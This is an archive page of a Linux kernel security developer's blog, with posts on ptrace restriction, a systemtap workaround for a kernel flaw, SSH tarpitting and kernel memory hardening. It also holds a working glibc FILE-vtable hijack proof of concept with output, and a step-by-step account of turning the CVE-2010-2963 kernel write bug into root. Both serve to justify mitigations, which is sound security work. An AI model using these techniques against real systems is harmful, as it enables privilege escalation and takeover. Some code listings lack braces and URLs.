Filed under: Blogging,Chrome OS,Security,Ubuntu,Ubuntu-Server — kees @ 4:48 pm

As I discussed last year, Ubuntu has been restricting the use of ptrace for a few releases now. I’m excited to see Fedora starting to introduce similar restrictions, but I’m disappointed at the specific implementation:

  • A method for doing this already exists (Yama). Yama is not plumbed into SELinux, but I would argue that’s not needed.
  • The SELinux method depends, unsurprisingly, on an active SELinux policy on the system, which isn’t everyone.
  • It’s not possible for regular developers (not system developers) to debug their own processes.
  • It will break all ptrace-based crash handlers (e.g. KDE, Firefox, Chrome) or tools that depend on ptrace to do their regular job (e.g. Wine, gdb, strace, ltrace).

Blocking ptrace blocks exactly one type of attack: credential extraction from a running process. In the face of a persistent attack, ultimately, anything running as the user can be trojaned, regardless of ptrace. Blocking ptrace, however, stalls the initial attack. At the moment an attacker arrives on a system, they cannot immediately extend their reach by examining the other processes (e.g. jumping down existing SSH connections, pulling passwords out of Firefox, etc). Some sensitive processes are already protected from this kind of thing because they are not “dumpable” (due to either specifically requesting this from prctl(PR_SET_DUMPABLE, ...) or due to a uid/gid transition), but many are open for abuse.

The primary “valid” use cases for ptrace are crash handlers, debuggers, and memory analysis tools. In each case, they have a single common element: the process being ptraced knows which process should have permission to attach to it. What Linux lacked was a way to declare these relationships, which is what Yama added. The use of SELinux policy, for example, isn’t sufficient because the permissions are too wide (e.g. giving gdb the ability to ptrace anything just means the attacker has to use gdb to do the job). Right now, due to the use of Yama in Ubuntu, all the mentioned tools have the awareness of how to programmatically declare the ptrace relationships at runtime with prctl(PR_SET_PTRACER, ...). I find it disappointing that Fedora won’t be using this to their advantage when it is available and well tested.

Even ChromeOS uses Yama now. ;)

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


fixing vulnerabilities with systemtap

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server,Vulnerabilities — kees @ 3:22 pm

Recently the upstream Linux kernel released a fix for a serious security vulnerability (CVE-2012-0056) without coordinating with Linux distributions, leaving a window of vulnerability open for end users. Luckily:

  • it is only a serious issue in 2.6.39 and later (e.g. Ubuntu 11.10 Oneiric)
  • it is “only” local
  • it requires execute access to a setuid program that generates output

Still, it’s a cross-architecture local root escalation on most common installations. Don’t stop reading just because you don’t have a local user base — attackers can use this to elevate privileges from your user, or from the web server’s user, etc.

Since there is now a nearly-complete walk-through, the urgency for fixing this is higher. While you’re waiting for your distribution’s kernel update, you can use systemtap to change your kernel’s running behavior. RedHat suggested this, and here’s how to do it in Debian and Ubuntu:

  • Download the “am I vulnerable?” tool, either from RedHat (above), or a more correct version from Brad Spengler.
  • Check if you’re vulnerable:
    $ make correct_proc_mem_reproducer
    $ ./correct_proc_mem_reproducer
  • Install the kernel debugging symbols (this is big — over 2G installed on Ubuntu) and systemtap:
    • Debian:
      # apt-get install -y systemtap linux-image-$(uname -r)-dbg
    • Ubuntu:
      • Add the debug package repository and key for your Ubuntu release:
        $ sudo apt-get install -y lsb-release
        $ echo "deb $(lsb_release -cs) main restricted universe multiverse" | \
              sudo tee -a /etc/apt/sources.list.d/ddebs.list
        $ sudo apt-key adv --keyserver --recv-keys ECDCAD72428D7C01
        $ sudo apt-get update
      • (This step does not work since the repository metadata isn’t updating correctly at the moment — see the next step for how to do this manually.) Install the debug symbols for the kernel and install systemtap:
        sudo apt-get install -y systemtap linux-image-$(uname -r)-dbgsym
      • (Manual version of the above, skip if the above works for you. Note that this has no integrity checking, etc.)
        $ sudo apt-get install -y systemtap dpkg-dev
        $ wget$(dpkg -l linux-image-$(uname -r) | grep ^ii | awk '{print $2 "-dbgsym_" $3}' | tail -n1)_$(dpkg-architecture -qDEB_HOST_ARCH).ddeb
        $ sudo dpkg -i linux-image-$(uname -r)-dbgsym.ddeb
  • Create a systemtap script to block the mem_write function, and install it:
    $ cat > proc-pid-mem.stp <<'EOM'
    probe kernel.function("mem_write@fs/proc/base.c").call {
            $count = 0
    $ sudo stap -Fg proc-pid-mem.stp
  • Check that you’re no longer vulnerable (until the next reboot):
    $ ./correct_proc_mem_reproducer
    not vulnerable

In this case, the systemtap script is changing the argument containing the size of the write to zero bytes ($count = 0), which effectively closes this vulnerability.

UPDATE: here’s a systemtap script from Soren that doesn’t require the full debug symbols. Sneaky, put can be rather slow since it hooks all writes in the system. :)

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


abusing the FILE structure

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 4:46 pm

When attacking a process, one interesting target on the heap is the FILE structure used with “stream functions” (fopen(), fread(), fclose(), etc) in glibc. Most of the FILE structure (struct _IO_FILE internally) is pointers to the various memory buffers used for the stream, flags, etc. What’s interesting is that this isn’t actually the entire structure. When a new FILE structure is allocated and its pointer returned from fopen(), glibc has actually allocated an internal structure called struct _IO_FILE_plus, which contains struct _IO_FILE and a pointer to struct _IO_jump_t, which in turn contains a list of pointers for all the functions attached to the FILE. This is its vtable, which, just like C++ vtables, is used whenever any stream function is called with the FILE. So on the heap, we have:

glibc FILE vtable location

In the face of use-after-free, heap overflows, or arbitrary memory write vulnerabilities, this vtable pointer is an interesting target, and, much like the pointers found in setjmp()/longjmp(), atexit(), etc, could be used to gain control of execution flow in a program. Some time ago, glibc introduced PTR_MANGLE/PTR_DEMANGLE to protect these latter functions, but until now hasn’t protected the FILE structure in the same way.

I’m hoping to change this, and have introduced a patch to use PTR_MANGLE on the vtable pointer. Hopefully I haven’t overlooked something, since I’d really like to see this get in. FILE structure usage is a fair bit more common than setjmp() and atexit() usage. :)

Here’s a quick exploit demonstration in a trivial use-after-free scenario:

#include <stdio.h>
#include <stdlib.h>

void pwn(void)
    printf("Dave, my mind is going.\n");

void * funcs[] = {
    NULL, // "extra word"
    NULL, // DUMMY
    exit, // finish
    NULL, // overflow
    NULL, // underflow
    NULL, // uflow
    NULL, // pbackfail
    NULL, // xsputn
    NULL, // xsgetn
    NULL, // seekoff
    NULL, // seekpos
    NULL, // setbuf
    NULL, // sync
    NULL, // doallocate
    NULL, // read
    NULL, // write
    NULL, // seek
    pwn,  // close
    NULL, // stat
    NULL, // showmanyc
    NULL, // imbue

int main(int argc, char * argv[])
    FILE *fp;
    unsigned char *str;

    printf("sizeof(FILE): 0x%x\n", sizeof(FILE));

    /* Allocate and free enough for a FILE plus a pointer. */
    str = malloc(sizeof(FILE) + sizeof(void *));
    printf("freeing %p\n", str);

    /* Open a file, observe it ended up at previous location. */
    if (!(fp = fopen("/dev/null", "r"))) {
        return 1;
    printf("FILE got %p\n", fp);
    printf("_IO_jump_t @ %p is 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));

    /* Overwrite vtable pointer. */
    *(unsigned long*)(str + sizeof(FILE)) = (unsigned long)funcs;
    printf("_IO_jump_t @ %p now 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));

    /* Trigger call to pwn(). */

    return 0;

Before the patch:

$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0xf7796aa0
_IO_jump_t @ 0x984609c now 0x0804a060
Dave, my mind is going.

After the patch:

$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0x3a4125f8
_IO_jump_t @ 0x984609c now 0x0804a060
Segmentation fault

Astute readers will note that this demonstration takes advantage of another characteristic of glibc, which is that its malloc system is unrandomized, allowing an attacker to be able to determine where various structures will end up in the heap relative to each other. I’d like to see this fixed too, but it’ll require more time to study. :)

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


PGP key photo viewing

Filed under: Blogging,Debian,Security,Ubuntu — kees @ 1:35 pm

Handy command line arguments for gpg:

gpg --list-options show-photos --fingerprint 0xdc6dc026

This is nice to examine someone’s PGP photo. You can also include it in --verify-options, depending on how/when you want to see the photo (for example, when doing key signings).

If gpg doesn’t pick the right photo viewer, you can override it with --photo-viewer 'eog %I' or similar.

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


5 years with Canonical

Filed under: Blogging,Debian,General,Security,Ubuntu — kees @ 9:58 am

This month, I will have been with Canonical for 5 years. It’s been fantastic, but I’ve decided to move on. Next week, I’m going to start working for Google, helping out with ChromeOS, which I’m pretty excited about. I’m sad to be leaving Canonical, but I comfort myself by knowing that I’m not leaving Ubuntu or any other projects I’m involved in. I believe in Ubuntu, I use it everywhere, and I’m friends with so many of its people. And I’m still core-dev, so I’ll continue to break^Wsecure things as much as I can in Ubuntu, and continue working on getting similar stuff into Debian. :)

For nostalgic purposes, I dug up my first security update (sponsored by pitti), and my first Ubuntu Security Notice. I’m proud of Ubuntu’s strong security record and how far the security feature list has come. The Ubuntu Security Team is an awesome group of people, and I’m honored to have worked with them.

I’m looking forward to the new adventures, but I will miss the previous ones.

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


non-executable kernel memory progress

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 2:39 pm

The Linux kernel attempts to protect portions of its memory from unexpected modification (through potential future exploits) by setting areas read-only where the compiler has allowed it (CONFIG_DEBUG_RODATA). This, combined with marking function pointer tables “const”, reduces the number of easily writable kernel memory targets for attackers.

However, modules (which are almost the bulk of kernel code) were not handled, and remained read-write, regardless of compiler markings. In 2.6.38, thanks to the efforts of many people (especially Siarhei Liakh and Matthieu Castet), CONFIG_DEBUG_SET_MODULE_RONX was created (and CONFIG_DEBUG_RODATA expanded).

To visualize the effects, I patched Arjan van de Ven’s arch/x86/mm/dump_pagetables.c to be a loadable module so I could look at /sys/kernel/debug/kernel_page_tables without needing to rebuild my kernel with CONFIG_X86_PTDUMP.

Comparing Lucid (2.6.32), Maverick (2.6.35), and Natty (2.6.38), it’s clear to see the effects of the RO/NX improvements, especially in the “Modules” section which has no NX markings at all before 2.6.38:

lucid-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | grep NX | wc -l

maverick-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | grep NX | wc -l

natty-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | grep NX | wc -l

2.6.38′s memory region is much more granular, since each module has been chopped up for the various segment permissions:

lucid-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | wc -l

maverick-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | wc -l

natty-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | wc -l

For example, here’s the large “sunrpc” module. “RW” is read-write, “ro” is read-only, “x” is executable, and “NX” is non-executable:

maverick-amd64# awk '/^'$(awk '/^sunrpc/ {print $NF}' /proc/modules)'/','!/GLB/' /sys/kernel/debug/kernel_page_tables
0xffffffffa005d000-0xffffffffa0096000         228K     RW             GLB x  pte
0xffffffffa0096000-0xffffffffa0098000           8K                           pte

natty-amd64# awk '/^'$(awk '/^sunrpc/ {print $NF}' /proc/modules)'/','!/GLB/' /sys/kernel/debug/kernel_page_tables
0xffffffffa005d000-0xffffffffa007a000         116K     ro             GLB x  pte
0xffffffffa007a000-0xffffffffa0083000          36K     ro             GLB NX pte
0xffffffffa0083000-0xffffffffa0097000          80K     RW             GLB NX pte
0xffffffffa0097000-0xffffffffa0099000           8K                           pte

The latter looks a whole lot more like a proper ELF (text segment is read-only and executable, rodata segment is read-only and non-executable, and data segment is read-write and non-executable).

Just another reason to make sure you’re using your CPU’s NX bit (via 64bit or 32bit-PAE kernels)! (And no, PAE is not slower in any meaningful way.)

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


Linux Security Summit 2011 CFP

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 11:06 am

I’m once again on the program committee for the Linux Security Summit, so I’d love to see people submit talks, attend, etc. It will be held along with the Linux Plumber’s Conference, on September 8th in Santa Rosa, CA, USA.

I’d really like to see more non-LSM developers and end-users show up for this event. We need people interested in defining threats and designing defenses. There is a lot of work to be done on all kinds of fronts and having people voice their opinions and plans can really help us prioritize the areas that need the most attention.

Here’s one of many archives of the announcement, along with the website. We’ve got just under 2 months to get talks submitted (May 27th deadline), with speaker notification quickly after that on June 1st.

Come help us make Linux more secure! :)

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


ptracing siblings

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 5:29 pm

In Ubuntu, the use of ptrace is restricted. The default allowed relationship between the debugger and the debuggee is that parents are allowed to ptrace their descendants. This means that running “gdb /some/program” and “strace /some/program” Just Works. Using gdb‘s “attach” and strace‘s “-p” options need CAP_SYS_PTRACE, care of sudo.

The next most common use-case was that of crash handlers needing to do a live ptrace of a crashing program (in the rare case of Apport being insufficient). For example, KDE applications have a segfault handler that calls out to kdeinit and requests that the crash handling process be started on it, and then sits in a loop waiting to be attached to. While kdeinit is the parent of both the crashing program (debuggee) and the crash handling program (debugger), the debugger cannot attach to the debugee since they are siblings, not parent/descendant. To solve this, a prctl() call was added so that the debugee could declare who’s descendants were going to attach to it. KDE patched their segfault handler to make the prctl() and everything Just Works again.

Breakpad, the crash handler for Firefox and Chromium, was updated to do effectively the same thing, though they had to add code to pass the process id back to the debuggee since they didn’t have it handy like KDE.

Another use-case was Wine, where for emulation to work correctly, they needed to allow all Wine processes to ptrace each other to correctly emulate Windows. For this, they just declared that all descendants of the wine-server could debug a given Wine process, there-by confining their ptrace festival to just Wine programs.

One of the remaining use-cases is that of a debugging IDE that doesn’t directly use ptrace itself. For example, qtcreator will launch a program and then later attach to it by launching gdb and using the “attach” command. This looks a lot like the crash handler use-case, except that the debuggee doesn’t have any idea that it is running under an IDE. A simple solution for this is to have the IDE run its programs with the LD_PRELOAD environment variable aimed at a short library that just calls prctl() with the parent process id, and suddenly the IDE and its descendants (i.e. gdb) can debug the program all day long.

I’ve got an example of this preloadable library written. If it turns out this is generally useful for IDEs, I could package it up like fakeroot and faketime.

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


shaping the direction of research

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server,Vulnerabilities — kees @ 1:45 pm

Other people have taken notice of the recent “auto-run” attack research against Linux. I was extremely excited to see Jon Larimer publishing this stuff, since it ultimately did not start with the words, “first we disabled NX, ASLR, and (SELinux|AppArmor) …”

I was pretty disappointed with last year’s Blackhat conference because so many of the presentations just rehashed ancient exploitation techniques, and very few actually showed new ideas. I got tired of seeing mitigation technologies disabled to accomplish an attack. That’s kind of not the point.

Anyway, Jon’s research is a step in the right direction. He defeats ASLR via brute-force, side-steps NX with ret-to-libc, and finds policy holes in AppArmor to accomplish the goal. I was pleased to see “protected by PIE and AppArmor” in his slides — Ubuntu’s hardening of evince was very intentional. It has proven to be a dangerous piece of software, which Jon’s research just further reinforces. He chose to attack the difficult target instead of going after what might have been the easier thumbnailers.

So, because of this research, we can take a step back and think about what could be done to improve the situation from a proactive security perspective. A few things stand out:

  • GNOME really shouldn’t be auto-mounting anything while the screen is locked (LP: #714958).
  • AppArmor profiles for the other thumbnailers should be written (LP: #715874).
  • The predictable ASLR found in the NX-emulation patch is long over-due to be fixed. This has been observed repeatedly before, but I hadn’t actually opened a bug for it yet. Now I have. (LP: #717412)
  • Media players should be built PIE. This has been on the Roadmap for a while now, but is not as easy as it sounds because several of them use inline assembly for speed, and that can be incompatible with PIE.
  • Consider something like grsecurity’s GRKERNSEC_BRUTE to slow down execution of potentially vulnerable processes. It’s like the 3 second delay between bad password attempts.

Trying to brute-force operational ASLR on a 64bit system, though, would probably not have worked. So, again, I stand by my main recommendation for security: use 64bit. :)

Good stuff; thanks Jon!

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


gcc-4.5 and -D_FORTIFY_SOURCE=2 with “header” structures

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 6:11 pm

Recently gcc (4.5) improved its ability to see the size of various structures. As a result, the FORTIFY protections have suddenly gotten a bit stricter. In the past, you used to be able to do things like this:

struct thingy {
    int magic;
    char data[4];

void work(char *input) {
    char buffer[1000];
    int length;
    struct thingy *header;

    header = (struct thingy *)buffer;

    length = strlen(input);
    if (length > sizeof(buffer) - sizeof(*header) - 1) abort();

    strcpy(header->data, input);
    header->magic = 42;


The problem here is that gcc thinks that header->data is only 4 bytes long. But gcc doesn’t know we intentionally overruled this (and even did length checking), so due to -D_FORTIFY_SOURCE=2, the strcpy() checks kick in when input is more than 4 bytes.

The fix, in this case, is to use memcpy() instead, since we actually know how long our destination is, we can replace the strcpy(...) line with:

    memcpy(header->data, input, length + 1); /* take 0-term too */

This kind of header and then data stuff is common for protocol handlers. So far, things like Wine, TFTP, and others have been experiencing problems with the change. Please keep an eye out for it when doing testing.

© 2010, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


TARPIT iptables target

Filed under: Blogging,Debian,Networking,Security,Ubuntu,Ubuntu-Server — kees @ 9:21 am

Want to use a network tarpit? It’s so easy to set up! Thanks to jpds for this whole post. :)

sudo module-assistant auto-install xtables-addons-source
sudo iptables -p tcp ... -j TARPIT

Though no such thing exists for IPv6 yet.

Here it is watching over the SSH port:

iptables -N INGRESS-SSH
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -j INGRESS-SSH
iptables -A INGRESS-SSH -p tcp --dport 22 -m state --state NEW -m recent --name SSH --set
iptables -A INGRESS-SSH -p tcp --dport 22 -m state --state NEW -m recent --name SSH --update --rttl --seconds 60 --hitcount 4 -j LOG --log-prefix "[INGRESS SSH TARPIT] "
iptables -A INGRESS-SSH -p tcp --dport 22 -m state --state NEW -m recent --name SSH --rcheck --rttl --seconds 60 --hitcount 4 -j TARPIT

© 2010, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


security is more than bug fixing

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 12:20 pm

Security is more than bug fixing. Security fixing/updating, the thing most people are exposed to, is “reactive security”. However, a large area of security work is “proactive” where defensive abilities are put in place to try and catch problems before they happen, or make classes of vulnerabilities unexploitable. This kind of security is what a lot of people don’t understand, and I think it’s important to point out so the distinction can be clearly seen.

In the Linux kernel, there’s yet another distinction: userspace proactive security and kernel proactive security. Most of the effort in kernel code has been protecting userspace from itself (things like Address Space Layout Randomization), but less attention has been given to protecting the kernel from userspace (currently if a serious enough flaw is found in the kernel, it is usually very easy to exploit it).

One project has taken great strides with proactive security for the Linux kernel: PaX and grsecurity. There hasn’t been a concerted effort to get its pieces upstream and it’s long overdue. People are starting to take proactive kernel security more seriously, though there is still plenty of debate.

While I did my best to push some userspace protections upstream earlier in the year, now it’s time for kernel protections. What to help? Here is the initial list of things to do.

Dan Rosenberg has started the information leaks discussion, and I’ve started the read-only memory discussion. Hopefully this will go somewhere good.

© 2010, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


Jettison Jaunty

Filed under: Blogging,Security,Ubuntu,Ubuntu-Server — kees @ 10:07 pm

Jaunty Jackalope (Ubuntu 9.04) went End-Of-Life on Saturday.

Looking back through my build logs, it seems my desktop did 223 builds, spending 19 hours, 18 minutes, and 23 seconds doing builds during the development cycle of Jaunty. Once released, it performed an additional 99 builds, taking 18 hours, 3 minutes, and 37 seconds for security updates. As before, these times obviously don’t include patch hunting/development, failed builds, testing, stuff done on my laptop or the porting machines, etc.

Combined devel/security build standings per current release:

dapper: 59:19:10
hardy: 189:32:51
karmic: 57:44:27
lucid: 36:07:05
maverick: 13:54:15

Looking at the build histories, Gutsy and Jaunty had about the same amount of builds (around 19 hours) during development, but Intrepid was a whopping 70 hours. This was related to all the default compiler flag testing there. I rebuilt the entire “main” component multiple times that release. Jaunty was a nice return to normalcy.

© 2010, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License


CVE-2010-2963 v4l compat exploit

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server,Vulnerabilities — kees @ 3:41 pm

If you’re running a 64bit system, and you’ve got users with access to a video device (/dev/video*), then be sure you update your kernels for CVE-2010-2963. I’ve been slowly making my way through auditing the many uses in the Linux kernel of the copy_from_user() function, and ran into this vulnerability.

Here’s the kernel code from drivers/media/video/v4l2-compat-ioctl32.c:

static int get_microcode32(struct video_code *kp, struct video_code32 __user *up)
        if (!access_ok(VERIFY_READ, up, sizeof(struct video_code32)) ||
                copy_from_user(kp->loadwhat, up->loadwhat, sizeof(up->loadwhat)) ||
                get_user(kp->datasize, &up->datasize) ||
                copy_from_user(kp->data, up->data, up->datasize))
                        return -EFAULT;
        return 0;

Note that kp->data is being used as the target for up->data in the final copy_from_user() without actually verifying that kp->data is pointing anywhere safe. Here’s the caller of get_microcode32:

static long do_video_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
        union {
                struct video_tuner vt;
                struct video_code vc;
        } karg;
        void __user *up = compat_ptr(arg);
        switch (cmd) {
                err = get_microcode32(&, up);

So, the contents of up are totally under control of the caller, and the contents of karg (in our case, the video_code structure) are not initialized at all. So, it seems like a call for VIDIOCSMICROCODE would write video_code->datasize bytes from video_code->data into some random kernel address, just causing an Oops, since we don’t control what is on the kernel’s stack.

But wait, who says we can’t control the contents of the kernel’s stack? In fact, this compat function makes it extremely easy. Let’s look back at the union. Notice the struct video_tuner? That gets populated from the caller’s up memory via this case of the switch (cmd) statement:

        case VIDIOCSTUNER:
        case VIDIOCGTUNER:
                err = get_video_tuner32(&karg.vt, up);

So, to control the kernel stack, we just need to call this ioctl twice in a row: once to populate the stack via VIDIOCSTUNER with the contents we want (including the future address for video_code->data, which starts at the same location as video_tuner->name[20]), and then again with VIDIOCSMICROCODE.

Tricks involved here are: the definition of the VIDIOCSMICROCODE case in the kernel is wrong, and calling the ioctls without any preparation can trigger other kernel work (memory faults, etc) that may destroy the stack contents. First, we need the real value for the desired case statement. This turns out to be 0x4020761b. Next, we just repeatedly call the setup ioctl in an attempt to get incidental kernel work out of the way so that our last ioctl doing the stack preparation will stick, and then we call the buggy ioctl to trigger the vulnerability.

Since the ioctl already does a multi-byte copy, we can now copy arbitrary lengths of bytes into kernel memory. One method of turning an arbitrary kernel memory write into a privilege escalation is to overwrite a kernel function pointer, and trigger that function. Based on the exploit for CVE-2010-3081, I opted to overwrite the security_ops function pointer table. Their use of msg_queue_msgctl wasn’t very good for the general case since it’s near the end of the table and its offset would depend on kernel versions. Initially I opted for getcap, but in the end used ptrace_traceme, both of which are very near the top the security_ops structure. (Though I need share credit here with Dan Rosenberg as we were working together on improving the reliability of the security_ops overwrite method. He used the same approach for his excellent RDS exploit.)

Here are the steps for one way of taking an arbitrary kernel memory write and turning it into a root escalation:

  • overwrite security_ops with default_security_ops, which will revert the LSM back to the capabilities-only security operations. This, however, means we can calculate where cap_ptrace_traceme is.
  • overwrite default_security_ops->ptrace_traceme to point to our supplied function that will actually perform the privilege escalation (thanks to Brad Spengler for his code from Enlightenment).
  • trigger the function (in this case, call ptrace(PTRACE_TRACEME, 0, NULL, NULL)).
  • restore default_security_ops->ptrace_traceme to point to cap_ptrace_traceme so the next caller doesn’t Oops the system (since userspace memory will be remapped).

Here’s the source for Vyakarana as seen running in Enlightenment using cap_getcap (which is pretty unstable, so you might want to switch it to use ptrace_traceme), and as a stand-alone memory writer.

Conclusions: Keep auditing the kernel for more arbitrary writes; I think there are still many left. Reduce the exploitation surface within the kernel itself (which PaX and grsecurity have been doing for a while now), specifically:

  • Block userspace memory access while in kernel mode. This would stop the ability to make the kernel start executing functions that live in userspace — a clear privilege violation. This protection would stop the current exploit above, but the exploit could be adjusted to use kernel memory instead.
  • Keep function pointers read-only. There is no reason for these function pointer tables (fops, IDT, security_ops, etc) to be writable. These should all be marked correctly, with inline code exceptions being made for updating the global pointers to those tables, leaving the pointer read-only after it gets set. This would stop this particular exploit above, but there are still plenty more targets.
  • Randomize the kernel stack location on a per-syscall basis. This will stop exploits that depend on a stable kernel stack location (as this exploit does).

© 2010, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

Older Posts »

Powered by WordPress